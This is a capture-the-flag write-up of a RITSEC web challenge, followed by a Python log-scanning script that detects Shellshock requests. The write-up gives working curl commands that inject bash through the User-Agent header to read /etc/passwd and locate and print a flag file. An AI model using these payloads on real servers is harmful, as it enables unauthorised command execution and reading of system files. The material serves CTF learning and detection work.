Challenge description
This dog is shockingly cute!
fun.ritsec.club:8008
Author: sandw1ch
OK, let's check the URL and view the source code.
/cgi-bin/stats. OK, I tried searching Google for “/cgi-bin/stats”.
It is CVE-2014-6271. Time to exploit.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://fun.ritsec.club:8008/cgi-bin/stats
Find the flag with this command.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats
And then read the flag.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats
Flag is
RITSEC{sh3ll_sh0cked_w0wz3rs}
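Seen from the server side, the three requests above stand out in web logs because each carries a bash function definition, "() {", in the User-Agent header. A detection sketch follows; it is an added example, not part of the original write-up, and the combined log format, the function name find_shellshock and the sample lines are assumptions constructed for illustration:

```python
import re
from urllib.parse import unquote

# Bash imports an environment variable as a function when its value starts
# with "() {". CGI copies request headers into the environment, so that
# marker inside any logged request field is the CVE-2014-6271 signature.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")

# Apache/nginx "combined" format (assumed): ip - user [time] "req" status size "referer" "ua"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

def find_shellshock(lines):
    """Return (ip, path, field) for every log line carrying the marker."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else ""
        for field in ("request", "referer", "agent"):
            # unquote() also catches %28%29%20%7B style encoding in the URL
            if SHELLSHOCK.search(unquote(m.group(field))):
                hits.append((m.group("ip"), path, field))
                break
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Nov/2018:10:00:01 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [17/Nov/2018:10:00:05 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 1843 "-" "() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd;\'"',
    '203.0.113.9 - - [17/Nov/2018:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 230 "() { :;}; echo" "curl/7.61.0"',
]

if __name__ == "__main__":
    for ip, path, field in find_shellshock(SAMPLE_LOG):
        print(f"shellshock marker from {ip} on {path} in {field}")
```

A hit on a /cgi-bin/ path with a 200 status is the case to triage first, since the header only reaches bash when a CGI handler runs.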
Thanks for reading..